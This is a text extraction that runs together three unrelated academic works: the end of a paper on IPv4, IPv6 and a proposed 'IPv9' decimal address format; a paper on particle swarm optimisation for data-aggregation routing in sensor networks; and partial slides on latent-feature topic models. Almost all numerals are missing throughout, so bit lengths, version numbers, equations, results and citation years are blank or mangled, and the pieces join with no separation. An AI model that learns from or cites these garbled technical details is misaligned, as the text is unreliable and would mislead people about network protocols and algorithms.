uses -bit addresses ( bits), which is about . x addresses, but ipv addresses up to bits in length does not say how many addresses there are per square meter of the earth. rather, ipv addresses were designed to be large in size, with the aim of further subdividing them into layered routing domains that reflect the topology of the modern internet. using a -bit address space provides multiple levels of hierarchy and flexibility in designing hierarchical addressing and routing, which is lacking in the current ipv -based internet. ipv addresses consist of global routing prefixes, subnet ids, and interface ids. where the global routing prefix is used to specify a site, the subnet id is used to specify a link within the site, and the interface id is used to specify an interface on the link. a. base ipv headers ipv datagram with multiple optional extension headers is shown in figure , and ipv base headers are shown in figure . figure . ipv datagram with multiple optional extension headers figure . basic ipv header with a length of bytes international journal of advanced network, monitoring and controls volume , no. , as shown in figure , the first line of the figure indicates the bit occupied by each field in the header format. compared to ipv , ipv fixed the base header with bytes, eliminated many unnecessary fields, and reduced the number of private segments in the header to (although the header length was doubled). the following explains the function of each field in the ipv basic header: ) version. it specifies the version of the protocol. ) traffic class. it distinguishes between different ipv datagram categories or priorities. ) flow label. it is a new mechanism for ipv to support pre-allocation of resources. ) payload length. it specifies the number of bytes in an ipv datagram other than the base header. ) next head. it is equivalent to the ipv protocol field or optional field. ) hop limit. it is used to prevent datagram from being in the network indefinitely. b. ipv address representation method ) colon hexadecimal form preferred form “n:n:n:n:n:n:n:n”.each n represents a -bit value and is hexadecimal, separated by a colon. for example: “ ffe:ffff: :feda: :ba : : ”. ) compressed form writing a long string of zeros can be simplified using a compressed form, where a single contiguous sequence of zeros is represented by a double colon, “: : ”.this symbol can only appear once in an address. for example, the local link unicast address fe : : : : : : : is shortened as“fe ::/ ”, and the multicast address ffde: : : : : : : is shortened as “ffed:: ”.loop address : : : : : : : compression form “:: ”. an unspecified address : : : : : : : is shortened as “::”. ) mixed form this form combines ipv and ipv addresses. in this case, the address format is “n:n:n:n:n:n:d.d.d.d”. where each “n” represents the -bit value of the ipv address and is represented in hexadecimal, and each “d” represents the -bit value of the ipv address and is represented in decimal. c. transition from ipv to ipv the transition from ipv to ipv can only be done incrementally, because the number of routers using ipv across the internet is so large that it is impractical to set a cut-off point to upgrade the system. there is also backward compatibility when installing a new ipv system.ipv system must be able to complete the ipv system to receive, forward ip datagram and routing selection. here are three strategies for transitioning to ipv : ) dual stack prior to the full transition to ipv , there were stacks of ipv and ipv on some hosts or routers. dual stack hosts or routers can communicate with both ipv and ipv systems. ) tunneling the point of this technique is that the ipv datagram is disguised as an ipv datagram, and the entire ipv datagram becomes the data portion of the ipv datagram. this allows unimpeded access to the ipv network and, upon leaving the ipv network, transfers the data portion of the ipv datagram to the host’s ipv protocol stack.ipv datagram is submitted to the ipv protocol stack to complete the communication. ) network address conversion/protocol conversion technology network address translation/protocol translation technology nat-pt (network address translation - protocol translation) is combined with siit protocol translation, dynamic address translation (nat) under traditional ipv and appropriate application layer gateway (alg).it enables communication between international journal of advanced network, monitoring and controls volume , no. , hosts with only ipv installed and most applications with only ipv machines installed. iv. the research status of ipv and ipv a. current status of ipv due to the allocation of ipv addresses adopts the principle of "first come, first served, distributed according to needs", the uneven distribution makes the address allocation has a huge loophole, which makes many countries and regions have insufficient ip address resources. with the development of internet, especially the explosive growth of scale, some inherent defects of ipv are gradually exposed, mainly focusing on address exhaustion, rapid expansion of routing table to the bottleneck, security and service quality is difficult to guarantee, and serious waste of ipv address structure. the design of ipv protocol does not consider the real-time transmission of audio stream and video stream.ipv does not provide encryption and authentication mechanisms, so the secure transmission of confidential data resources cannot be guaranteed. b. current status of ipv due to the limitations of the technology era, there are many defects in the design idea of the address structure of ipv .the richness of the ipv bit address length makes it more than just a matter of extending the address. instead of following the principle of transparency between different protocol layers, ip addresses, which should belong to the protocol of the network layer, are mixed with physical layer addresses and application layer, resulting in a series of fatal consequences. v. ipv address code ipv not only expands the length of ip address, but also makes the network support more address levels. in addition, the method of address coding method of the variable-length and variable-position is adopted, and the parsing link is cancelled. the formal text representation method used by human is directly converted into machine language, which actually reduces the overhead of network. a. ipv header format ipv header format design is shown in figure . figure . header format of ipv figure design explanation is as follows: ) version. it has a length of four bits. internet protocol version number, for ipv , this field must be . ) traffic class. it has a length of bits. the three bits high are used to specify the length of the address, and the value is to , which is the power of .the address length is byte ~ byte.the default value is bits, where is bits, is bits, is bits, is bits, is bits, is bits, is bits, international journal of advanced network, monitoring and controls volume , no. , and is bits. the last five bits specify the communication class and authentication for the source and destination addresses. through are the priority values, where through are used to specify the priority class for the traffic. through are used to specify a communication method for authentication before communication, which is used by the packet sender for traffic control and whether authentication of source and destination addresses is required. through are used to specify absolute traffic that will not fall back when congestion is encountered. for virtual circuits. and respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. the other values are reserved for future use. ) flow label. it is bits long and is used to identify packages that belong to the same business flow. ) payload length. it has a length of bits, including the net payload of bytes, which is the number of bytes contained in the packet behind the ipv header. ) next header. its length is bits, and this field indicates the protocol type in the field following the ipv header. ) hop limit. its length is bits, and this field is subtracted by one each time a node forwards a packet. ) source address. its length is bit ~ bit; specify ipv packet sender address, using variable length and location method. ) destination address. its length is bit ~ bit, and the destination address of ipv packet is specified. ) time. it is used to control the lifetime of the address in the header. ) identification code. it identifies the authenticity of the address in the header. b. text representation of ipv addresses this paper has developed a unified method to represent ipv address, including "bracket decimal", "curly braces decimal" and "parentheses bracket". ) bracket decimal the bracket decimal can be expressed in the following two ways: method : use "[]" when the length is bits. where, the parentheses are expressed in decimal notation, and the length can be written in indefinite length. method : length able address in the form of representation is "y[y] [y] [y] [y] [y] [y]", where each y represents the address as a bit part, and used the decimal representation. because = . each "y" represents a bits portion of the address and is represented in decimal. the difference in decimal number of each of the range is to , such as the first digit from left the range is ~ , so you don't have the phenomenon of overflow. ) curly braces decimal this method divides the -bit address into four -bit decimal numbers represented by curly braces separating them. the representation is "z}z}z}z", where each z represents a -bit portion of the address and is represented in decimal. it's exactly the same as y, but it's also compatible with y, so you can mix the two. this approach makes it very convenient for ipv addresses to be compatible in ipv .such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; ) bracketed notation international journal of advanced network, monitoring and controls volume , no. , since ipv has an address length of bits, whether you use four or eight segments, there are still many bits in each segment. for example: ...] ]... ...] ]... the above situation input cumbersome, prone to errors. for convenience, the parenthesis notation -- (k/l) is introduced. where "k" means or and "l" means the number of or .in this way, the above two examples can be abbreviated as: ...]( / ) of ]... ...] ( / )]... ) text representation of address prefixes the ipv address scheme is similar to the cidr (unclassified addressing) scheme of ipv in that the address prefix is used to represent the network hierarchy. on the representation of ipv address prefix, a representation similar to cidr is adopted, whose form is as follows: ipv address/address prefixes length for example, address prefix [ [ [ [ [ [ of bits can be expressed as: [ [ [ [ [ [ [ / ) ipv address type c) pure ipv address the form is y[y[y[y[y[y[y[y each “y” represents a decimal integer from to = . d) ipv addresses compatible with ipv the form is: y[y[y[y[y[y[y[d.d.d.d each “y” represents a decimal integer from to = . “d” represents a decimal integer between and from the original ipv . e) ipv addresses compatible with ipv the form is: y[y[y[y[x:x:x:x:x:x:x:x each “y” represents a decimal integer from to = .the “x” represents a hexadecimal number that originally ipv ranged from to ffff. f) special compatibility address in order to guarantee the research results of ipv and ipv , ipv has designed some compatible addresses. the new compatibility address design idea is in this part of the address with the appropriate prefix form. in order to make their representation more convenient and ensure accuracy, the following abbreviations were introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each y represents the address as bits, represented by decimal; each “x” represents the original ipv address of bits, in hexadecimal; each “d” represents the original ipv address of bits, in decimal notation. g) [] full decimal address in order to facilitate the application of logistics code and full decimal address. category number is recommended. in the power of to the power of , fixed length positioning method is adopted according to application needs. h) ipv address for transitional period ipv is compatible with ipv and ipv technical protocols for the internet, but ipv and ipv technical protocols are not compatible with ipv in reverse. c. ipv and ipv transition to ipv in order to solve the ipv flat to ipv transition, special design ipv transition address. transitioning ipv to a address in the ipv address allows a small change to the current system to complete the transition. in ipv , there is a section of j.j.j.j address, where each “j” represents a decimal number from to ( ~ ), where the preceding [ ] can be omitted in the middle of the local address, that is, local users (or designated users) can use j.j.j.j directly, which is different from the original ipv d.d.d.d. at the same time, this part of the user in order to smooth the international journal of advanced network, monitoring and controls volume , no. , transition to full decimal can be allocated at the same time decimal. in order to improve the software and hardware in the future, there is no need to re-address, such as [ ] can be written into [ ] . . . can be directly used in a local ip network to write . . . , so that the original terminal can be used. interim ipv address system can be modified to the original ipv system. the ipv header is also used, but the version number is to distinguish the original ipv .however, users may use the original terminal equipment within the territory. ipv header tcp/udp header data ipv header ipv header tcp/udp header data ipv header tcp/udp header data raw ipv datagrams the ipv header encapsulates the ipv header in the tunnel ipv datagrams restored through the tunnel ipv host- ipv /ipv tunnel router-r ipv router- ipv router- ipv /ipv tunnel router-r ipv host- internet[ipv ] figure . ipv is ipv compatible figure above means that it is possible to build the ipv backbone, provide application services and gradually upgrade the backbone network to ipv without affecting or modifying the existing terminal ipv applications.ipv inherited and transplanted most of the application functions on the existing ipv internet, and successfully solved the development problem of ipv online application functions. most of the existing internet application functions can be copied to the ipv network, and began to enter the practical stage. at the same time, the application of ipv will continue to innovate and develop. d. support ipv device working mode in the decimal network working group of scientific research, the current ipv support devices are ipv - m wifi router, ipv - m wi-fi router, ipv - m router, ipv - g router, ipv -linux client and ipv -windows client. the ipv router network interface types include ordinary ethernet interface, to interface (convert ipv packets into ipv packets according to custom mapping rules), to interface (convert ipv packets into ipv packets according to custom mapping rules) and sit interface (realize ipv data packets to be transmitted in the current ipv network. implement over , where ipv data over is the data portion of the ipv packet. the following takes ipv / m wifi router as an example to explain its working mode vpn. under the vpn mode, most configuration of the router is completed by the background server, which is divided into ipv mode and ipv mode. in ipv mode, the router runs the nat module, and the client (ipv ) accesses the internet network in the same way as other ipv routers. when the client accesses the server in ipv backbone network, the vpn server will communicate with it. although the pure ipv client is not supported in this mode, the communication between the client of wifi router a and the client of wif router b is supported. the data flow diagram is shown in figure below: international journal of advanced network, monitoring and controls volume , no. , (a) one-way access between ipv of vpn tunnel and beijing backbone node (b) ipv reciprocal visits within the vpn tunnel figure . (a) one-way access between ipv of vpn tunnel and beijing backbone node; (b) ipv reciprocal visits within the vpn tunnel international journal of advanced network, monitoring and controls volume , no. , in ipv mode, clients (ipv ) access the internet network in the same way as other ipv routers. this mode supports the pure ipv client, but does not support the communication between the client of wifi router a and the client of wif router b, as shown in data flow figure . (a) ipv exchange visits between vpn tunnel and beijing backbone node (b) ipv mutual visits within the vpn tunnel figure . (a) ipv exchange visits between vpn tunnel and beijing backbone node; (b) ipv mutual visits within the vpn tunnel international journal of advanced network, monitoring and controls volume , no. , to sum up, ipv inherits most functions on the existing internet. in the protection of ipv and ipv research results, address expansion, security verification and other operations. this makes ipv more competitive in the development of the internet, and its functions will continue to develop with the development of technology. vi. summarizes although the use of nat (" network address translation "), cidr (" classless inter-domain routing ") and other technologies can alleviate the ipv crisis to some extent. however, this does not fundamentally solve the problem, and at the same time, it will bring about new problems in cost, service quality, safety and other aspects, but create greater challenges. but the new generation network layer protocol ipv itself also has the corresponding question, causes it not to have the omni-directional. in this situation, a new network will come into being, which not only represents the progress of people's technology, but also symbolizes people's dedication to new technology. this paper mainly designs and researches the new network address coding, compares the ipv and ipv address coding, and proposes a new address coding. this method solves the problem of address exhaustion thoroughly, and puts forward the theory of verification before communication, which solves the problems of current network address exhaustion and information security. it also describes the ipv -compatible ipv working mode, which guarantees the existing research results, provides some new design ideas for new network addresses, and promotes the development of new network addresses. references [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group.internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group.transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group.a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] information technology-futurenetwork-problem statement and requirement-part : security, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping,etc.product and servicedigital identification format for information procession.sj/t - , . . [ ] s. deering, r. hinden, internet protocol, version (ipv )-specification, network working group. rfc- , . . your paper's title starts here: please center gathering correlated data in wireless sensor networks using a heuristic algorithm yuexian wang, cheng chew lim school of electrical and electronic engineering, the university of adelaide, adelaide, australia, {jwang, cclim}@eleceng.adelaide.edu.au abstract. we propose a routing scheme for data gathering and aggregation in wireless sensor networks. the scheme aims to optimise an aggregation tree in order to minimise the energy dissipation of data aggregation and transmission. a modified particle swarm optimisation algorithm is developed in the proposed scheme. in addition, the routing scheme uses a generic data aggregation model which accommodates different correlation conditions. the performance of the proposed scheme is evaluated and compared with three other existing data gathering algorithms. simulation results show that the proposed scheme outperforms existing algorithms in terms of energy consumption and that the scheme can adapt to the change of network connectivity and data correlation conditions. keywords: sensor networks, data aggregation, particle swarm optimisation, correlation coefficient, energy consumption . introduction in wireless sensor networks, a large number of sensor nodes are scattered in an observed region and left unattended after deployment, and all nodes in the network are thus energy-constrained. energy consumption, scalability, and load balancing are important requirements for many data gathering sensor network applications. the tree-based data gathering algorithm is proposed for achieving development in this area, such as the shortest path tree algorithm [ ], the minimum spanning tree algorithm [ ] and the shallow light tree algorithm [ ]. in a tree-based network, sensor nodes are organised into a tree structure where data aggregation is performed at intermediate nodes along the tree and a concise representation of the data is transmitted to the root node. therefore, the research problem is to find out a routing tree with data aggregation to achieve minimum energy expense. this problem is an np-complete problem [ ,] because it can be reducible to a weighted set cover problem in graph theory, which has been shown to be np complete [ ]. in this paper, we propose a routing scheme for data gathering and aggregation in wireless sensor networks. the scheme utilises a heuristic algorithm to optimise data traffic and the transmission structure in terms of energy consumption. using this heuristic algorithm, significant data traffic can be reduced since more reasonable aggregator nodes to eliminate data redundancy can be selected. in order to reduce the energy consumption for data transmission, the heuristic algorithm optimises transmission structure as well. in addition, a generic aggregation model which does not depend on any specific relationship among correlated data is exploited in order to adapt to a variety of applications. the remainder of this paper is organised as follows: section gives the introduction to the standard particle swarm optimisation algorithm. the system models of our new scheme are presented in section . the details of the proposed modified particle swarm optimisation algorithm for the routing scheme are described in section . section discusses the performance evaluation and simulation results and section concludes the paper. . standard particle swarm optimisation algorithm the particle swarm optimisation (pso) algorithm stems from the simulation of a simplified society model, and it was proposed as a typical heuristic algorithm inspired by the behaviour of bird flocking [ ]. the pso was used to search optimal or near-optimal solutions in large search space. assume that in a d-dimensional searching space m particles compose a swarm and fly with a certain velocity, where the particle i denotes a d-dimensional vector },...,,{ idiii xxxx  , i= , , ..., m. the performance of i x is assessed by its fitness value which is calculated through substituting i x into the objective function. the motion of particles changes according to the following equations: )()()()( t id t gbest t id t ibest t id t id xprandcxprandcvv    , ( )   t id t id t id vxx , ( ) where t is the iteration number, id v denotes the velocity of the particle i in the dth dimensional ( ≤ d ≤ d) particle swarm space, id x represents the particle i current position, ibest p is its best previous position, and gbest p is the best position among all particles in the population. rand() is a random function with a range [ , ]. c and c are learning factors used to accelerate the motion speed of particles. the inertia weight, ω is a user-specified parameter that controls, mailto:cclim% d@eleceng.adelaide.edu.au with c and c , the impact of previous historical values of particle velocities on its current one. a large inertia weight facilitates global exploration while a small inertia weight facilitates fine-tuning local search. . system models a.network model. one base station and n sensors are assumed to be distributed uniformly in a field and quasi- stationary. the base station sends a query and k (k  n) sensors respond to that query. wireless links are considered bidirectional and symmetric so that any two nodes can communicate using the same transmission power levels only if they are within range of each other. sensor nodes are homogenous and arbitrarily allocated with equal initial energy. in addition, nodes are not location-aware and left unattended after deployment. b.data correlation and aggregation model. we assume that there is correlation among the data generated by the k sensors. to possibly accommodate a wide range of scenarios, we abstract data redundancy among two sensor nodes using a single value ρ, termed the correlation coefficient. assume that data amount after aggregation is not less than any of its inputs and not more than the sum of all inputs. let iv r and jv r be the amount of data generated by the node i v and j v in response to a query. without loss of generality, if ji vv rr  , the output ),( ji vvr after data aggregation is: ji vvji rrvvr ) (),(  , ( ) c.energy model. we adopt both the free-space propagation model to approximate path loss sustained because of wireless channel transmission [ ]. the energy expanded by the radio for transmitting and receiving an l bit message over a distance d, is given by: ),( dlledle fselectx  , ( ) elecrx lele )( ( ) where tx e is the energy dissipated in the transmitter, elec e is the per bit energy dissipation for running the transceiver circuitry, fs  is the amplifier parameter for the free space propagation model, and rx e is the radio expends of receiver. . problem formulation given the set of source node s and the base station d in wireless sensor networks g(v, e), our objective is to find a connected subgraph g′(v′, e′)  g, where s  v′, and d  v′, in order to minimise the energy consumption for transmitting data from all source nodes to the base station. the objective function is formulated as follows:   ' ),(min vv iv i i dvr  , ( ) where ),( dv i  is the total weight of edges on path from node i v to base station on constructed aggregation tree. in wireless networks, the weight of each edge can be considered as the energy expended for per unit data communication and data aggregation. iv r is the amount of data generated by node i v . . pso modified by genetic algorithm for routing with aggregation the standard pso algorithm is the real valued pso, and it cannot operate addition or subtraction directly on the path. hence, the standard pso algorithm should be extended to deal with the discrete optimisation problems which require the ordering or arranging of discrete elements, eg. the routing tree with aggregation problem. facing the problems, we propose a pso algorithm which is modified by the genetic algorithm [ ] in order to address the discrete nature of our optimisation problem. the core of this algorithm is an equivalent form of velocity and displacement formulae combining the thought of genetic algorithm. hence, eq. and eq. are replaced by eq. and eq. . )()( t id t gbest t id t ibest t id t id xpxpvv    , ( )   t id t id t id vxx , ( ) where the operator  represents a composition, and the operator  indicates information exchange which is implemented by crossover. a.encoding. encoding involves coding paths serial numbers into a feasible solution (or a position) in the search space. we represent the individual, for a specific aggregation tree, as a string of node numbers. the length of each individual is always equal to the number of relay nodes. a routing scheme for a network with relay nodes, and one base station, is shown in fig. (a) and the corresponding particle is shown in fig. (b). (a) routing tree (b) individual (solution representation) fig. encoding a routing tree as an individual b.population initialisation. in general, there are two ways to generate the initial population, heuristic initialisation and random initialisation. for most large scale problems, such as network communication design, random initialisation has better effect on global optimal solutions. the main idea of our work is that the correspondence of nodes behaviour through local optimisation is greater than the correspondence of nodes behaviour in random initialisation. the spt algorithm and the mst algorithm have good results in the initial population, when correlation coefficient is equal to and respectively. hence the initial population should include the shortest path tree and the minimum spanning tree. c.fitness function. we define the fitness value as the energy consumption of the network, and our metric for total energy dissipation takes into consideration including the transmit energy, the receive energy and aggregation energy. d.selection. the function of selection operator is to select individuals which have relative large fitness values with relative large probabilities from their parent generation. the pso algorithm then puts the chosen individuals in the offspring generation and waits for further evolution implemented by crossover and mutation. we adopt the ranking selection [ ] as a part of implementation of the modified pso algorithm in this paper. e.crossover. the operator  in eq. indicates information exchange which is similar to the operation of crossover in the genetic algorithm, so we use the crossover as the equivalent form of the  operation. because of the requirement of encoding, source nodes are known at the stage of crossover. first, we randomly select a gene in the locus of the same source node between the optimal individual and a generic individual and put it into the same locus of the offspring. we then make the same selection at the locus of the relay node which is indicated by the previous chosen gene. this process is repeated until the base station is found. for the rest nodes which are not used, genes from the same locus between the two individuals are selected randomly. fig. is an example for the crossover operation. fig. crossover between the optimal individual and the generic individual. f.mutation. multiplying ω by k id v in eq. , indicating that a particle searches toward a new space, is similar to the operation of mutation in the genetic algorithm, so we use the mutation as the equivalent form of k id v . we select a node to substitute for node from set Ω where the node has the same previous hop node and next hop node as the nod . this process is illustrated by fig. . fig. examples of the mutation operation. g.addition. the addition operation indicates the sum of several processing steps. through orderly executing the equivalent subitems in the pso algorithm, we can obtain the effect of addition. in the equivalence of the addition, the outputs of previous steps are the inputs of latter steps. according to eq. and eq. , the computation sequence is from right to left. applying two crossover operations and one mutation operation to a generic aggregation tree, we can acquire an offspring and then put it in the population for the next iteration. . simulation results and discussions in our simulation, average energy dissipation and the maximum run (the first node dies) are metrics used to compare the pso algorithm with three existing tree-based data gathering algorithms: the shortest path tree (spt) algorithm, the minimum spanning tree (mst) algorithm, and the shallow light tree (slt) algorithm. a square region of size m× m is uniformly divided into grids, and each sensor is deployed in one grid. since the coordinate of each sensor is determined by a random function which can generate uniformly distributed random numbers within the interval [ , ], the sensor nodes are randomly distributed. each node is equipped with j initial energy at the beginning of the simulation. every node transmits a bit message per round to the base station. the calculation of energy dissipation in the simulations is based on eq. and eq. . we use the same parameters as that in [ ]: elec e = nj/bit and fs  = pj/bit/ m . moreover, the per bit energy dissipation for aggregating data is set as da e = nj/bit/signal and the transmission range is set as r = m . (a) (b) fig. influence of the number of source nodes on (a) mean of energy consumption versus the number when ρ approaches and (b) mean of energy consumption versus the number of source nodes when ρ approaches fig. (a) shows the mean of energy consumption per round versus the number of source nodes using an aggregation tree with the pso algorithm, the mst algorithm, the spt algorithm, and the slt algorithm. clearly, when ρ approaches the pso algorithm performs as well as the spt algorithm and reduces energy consumption significantly compared with the mst algorithm and the slt algorithm. a reduction of average energy consumption of about % and % can be obtained by the pso algorithm as well as the spt algorithm over the slt algorithm and the mst algorithm, respectively. in a network with poor correlation, the pso algorithm reduces to the spt algorithm, and data should be transmitted directly to the base station via the shortest paths instead of aggregator nodes by detouring, since there is no redundancy among the data, and aggregation at any relay node is not efficient in reducing the data amount. when ρ approaches as illustrated in fig. (b), the pso algorithm performs better than all other algorithms with regard to the mean of energy consumption. a reduction of average energy consumption of about %, %, and % can be obtained by the pso algorithm over the mst algorithm, the slt algorithm, and the spt algorithm respectively. the performance of the mst algorithm is the closest to that of the pso algorithm. however, since some nodes within one hop to the base station would waste energy for detouring to aggregator nodes rather than transmitting directly to the base station, the mst algorithm cannot achieve the optimal performance. because the nodes can not sufficiently take advantage of data aggregation to reduce the transmission task, the spt algorithm expends the most energy compared with the three other algorithms. the slt algorithm can balance between data aggregation and direct transmission, but it gets the benefit implicitly. hence the energy consumption of the pso algorithm increases more slowly than the slt algorithm with the increase in the number of source nodes. fig. (a) illustrates the average energy consumption of the four algorithms when the number of source node k= . the costs of all algorithms decrease with the increase in ρ, the correlation coefficient. this exemplifies that data aggregation in sensor networks can greatly benefit the routing performance by reducing redundancy among correlated data. in addition, the pso algorithm evidently outperforms other algorithms in the energy consumption with the increase in the correlation coefficient. a reduction of average energy consumption of about %, %, and % can be obtained by the pso algorithm over the slt algorithm, the mst algorithm, and the spt algorithm, respectively. when ρ is small, the spt algorithm performs well. however, it does not benefit from the increase in ρ as it cannot efficiently perform data aggregation to eliminate redundancy among data. in the contrast, the mst algorithm gets the worst performance when ρ is small since it pursues data aggregation but data are actually low correlated. the pso algorithm performs much better than the slt algorithm since the pso algorithm recalculates total energy dissipation in every stage to get perfect matching and thus can adapt to the correlation among nodes. we can see from fig. (b) that the maximum run of all algorithms grows with the increase in ρ. the main reason is that data aggregation can significantly reduce traffic by eliminating redundancy among correlated data and hence consume less energy. since aggregator nodes receive data from different nodes and perform data aggregation, they always die earlier than others due to the heavy load. when ρ < . , the spt algorithm outperforms other algorithms markedly because data are opportunistically aggregated and the amount of data for aggregation is not large. the spt algorithm does not benefit well when ρ increases from . to due to insufficient data aggregation. because the mst algorithm and the slt algorithm prefer to detour to pursue data aggregation, large amount of data may be aggregated on nodes near the sources, and these aggregator nodes will exhaust energy earlier than that in the pso algorithm. in addition, the maximum run of the pso algorithms drops dramatically when ρ varies from to . because the pso algorithm can find out more aggregator nodes to share the same paths and the load of aggregator nodes becomes heavier. (a) (b) fig. influence of correlation coefficient on (a) mean of energy consumption versus the correlation coefficient when k= and (b) the number of run versus the correlation coefficient when k= . conclusions we propose an energy-efficient data gathering and aggregation routing scheme that caters for the energy challenges in wireless sensor networks. the particle swarm optimisation algorithm is utilised to optimise a joint objective between data traffic and transmission structure. the scheme also adopts a generic data aggregation model which accommodates different correlation conditions. simulation results show that the particle swarm optimisation algorithm outperforms its counterparts in terms of energy consumption. although there is a small sacrifice in the maximum run due to the heavy load of aggregator nodes, the particle swarm optimisation algorithm can be regarded as a good tradeoff since it can save energy and adapt to the change of network connectivity and data correlation conditions. references [ ] w. heinzelman, j. kulik, and h. balakrishnan, “adaptive protocols for information dissemination in wireless sensor networks,” in proc. acm mobicom, aug. , pp. - . [ ] r. c. prim, “shortest connection networks and some generalization,” bell system technical, vol. , no. , pp. - , . [ ] a. goel and k. munagala, “balancing steiner trees and shortest path trees online,” in proc. th acm-siam symp. on discrete algorithms, jan. , pp. - . [ ] r.cristescu, b. beferull-lozano, and m. vetterli, “on network correlated data gathering,” in proc. ieee infocom, vol. , mar. , pp. - . [ ] m. r. garey and d. johnson, computers and intractability: a guide to the theory of np-completeness. w. h. freeman, . [ ] j. kennedy and r. c. eberhart, “particle swarm optimization,” in the ieee conf. on neural networks, iv, , pp. - . [ ] h. xia, h. l. bertoni, and l. r. maciel, “radio propagation characteristics for line-of-sight microcellular and personal communications,” antenna and propagation, vol. , no. , pp. - , oct. . [ ] z. michalewicz, genetic algorithms + data structures = evolution programs, rd ed., springer-verlag, . [ ] j. e. baker, “adaptive selection methods for genetic algorithms,” in proc. the st international conference on genetic algorithms, , pp. - . [ ] w. r. heinzelman, a. chandrakasan, and h. balakrishnan, “an application-specific protocol architecture for wireless microsensor networks,” wireless communications, vol. , no. , pp. - , october . improving topic models with latent feature word representations improving topic models with latent feature word representations mark johnson joint work with dat quoc nguyen, richard billingsley and lan du dept of computing macquarie university sydney australia july / outline introduction latent-feature topic models experimental evaluation conclusions and future work / high-level overview • topic models take a corpus of documents as input, and jointly cluster: É words by the documents that they occur in, and É documents by the words that they contain • if the corpus is small and/or the documents are short, these clusters will be noisy • latent feature representations of words learnt from large external corpora (e.g., word vec, glove) capture various aspects of word meanings • here we use latent feature representations learnt on a large external corpus to improve the topic-word distributions in a topic model É we combine the dirichlet-multinomial models of latent dirichlet allocation (lda) with the distributed representations used in neural networks É the improvement is greatest on small corpora with short documents, e.g., twitter data / related work • phan et al. ( ) assumed that the small corpus is a sample of topics from a larger corpus like wikipedia, and use the topics discovered in the larger corpus to help shape the topic representations in the small corpus É if the larger corpus has many irrelevant topics, this will “use up” the topic space of the model • petterson et al. ( ) proposed an extension of lda that uses external information about word similarity, such as thesauri and dictionaries, to smooth the topic-to-word distribution • sahami and heilman ( ) employed web search results to improve the information in short texts • neural network topic models of a single corpus have also been proposed (salakhutdinov and hinton, ; srivastava et al., ; cao et al., ). / latent dirichlet allocation (lda) θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) wdi ∼ cat(φzdi ) • latent dirichlet allocation (lda) is an admixture model, i.e., each document d is associated with a distribution over topics θd • inference is typically performed with a gibbs sampler over the zd,i, integrating out θ and φ (griffiths et al., ) p(zdi =t | z¬di ) ∝ (n t d¬i + α) n t,wdi ¬di + β nt¬di + v β / the dirichlet multinomial mixture (dmm) model θ ∼ dir(α) zd ∼ cat(θ) φz ∼ dir(β) wdi ∼ cat(φzd ) • the dirichlet multinomial mixture (dmm) model is a mixture model, i.e., each document d is associated with a single topic zd (nigam et al., ) • inference can also be performed using a collapsed gibbs sampler in which θ and φz are integrated out (yin and wang, ) p(zd = t | z¬d ) ∝ (m t ¬d + α) Γ(nt¬d + v β) Γ(nt¬d + nd + v β) ∏ w∈w Γ(nt,w¬d + n w d + β) Γ(nt,w¬d + β) / latent feature word representations • traditional count-based methods (deerwester et al., ; lund and burgess, ; bullinaria and levy, ) for learning real-valued latent feature (lf) vectors rely on co-occurrence counts • recent approaches based on deep neural networks learn vectors by predicting words given their window-based context (collobert and weston, ; mikolov et al., ; pennington et al., ; liu et al., ) • we downloaded the pre-trained vectors for word vec and glove for this paper / outline introduction latent-feature topic models experimental evaluation conclusions and future work / latent-feature topic-to-word distributions • we assume that each word w is associated with a word vector ωw • we learn a topic vector τt for each topic t • we use these to define a distribution cate(w) over words: cate(w | τtω>) ∝ exp(τt ·ωw ) É τtω > is a vector of unnormalised scores, one per word • in our topic models, we mix the cate distribution with a multinomial distribution over words, so we can capture ideosyncratic properties of the corpus (e.g., words not seen in the external corpus) É we use a boolean indicator variable that records whether a word is generated from cate or the multinomial distribution / the latent feature lda model θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) sdi ∼ ber(λ) wdi ∼ ( − sdi )cat(φzdi ) + sdi cate(τzdi ω >) • sdi is the boolean indicator variable indicating whether word di is generated from cate • λ is a user-specified hyper-parameter determining how often words are generated from the cate distribution É if we estimated λ from data, we expect it would never generate through cate / the latent feature dmm model θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) sdi ∼ ber(λ) wdi ∼ ( − sdi )cat(φzdi ) + sdi cate(τzdi ω >) • sdi is the boolean indicator variable indicating whether word di is generated from cate • λ is a user-specified hyper-parameter determining how often words are generated from the cate distribution / inference for the lf-lda model • we integrate out θ and φ as in the griffiths et al. ( ) sampler, and interleave map estimation for τ with gibbs sweeps for the other variables • algorithm outline: initialise the word-topic variables zdi using the lda sampler repeat: for each topic t: τt = arg maxτt p(τt | z,s) for each document d and each word location i: sample zdi from p(zdi | z¬di ,s¬di ,τ) sample sdi from p(sdi | z,s¬di ,τ) / inference for the lf-dmm model ( ) • we integrate out θ and φ as in the yin and wang ( ) sampler, and interleave map estimation for τ with gibbs sweeps • algorithm outline: initialise the word-topic variables zdi using the dmm sampler repeat: for each topic t: τt = arg maxτt p(τt | z,s) for each document d: sample zd from p(zd | z¬d,s¬di ,τ) for each word location i: sample sdi from p(sdi | z,s¬di ,τ) • note: p(zd | z¬d,s¬di ,τ) is computationally expensive to compute exactly, as it requires summing over all possible values for sd / inference for the lf-dmm model ( ) • the computational problems stem from the fact that all the words in a document have the same topic É have to jointly sample document topic zt and indicator variables sd É the sampling probability is a product of ascending factorials • we approximate these probabilities by assuming that the topic-word counts are “frozen”, i.e., they don’t increase within a document É the dmm is mainly used on short documents (e.g., twitter), where the “one topic per document” assumption is accurate ⇒ “freezing” the counts should have less impact É could correct this with a metropolis-hastings accept-reject step p(zd,sd | z¬d,s¬d,τ) ∝ λ kd ( −λ)nd (mt¬d + α) Γ(nt¬d + v β) Γ(nt¬d + nd + v β) � ∏ w∈w Γ(nt,w¬d + 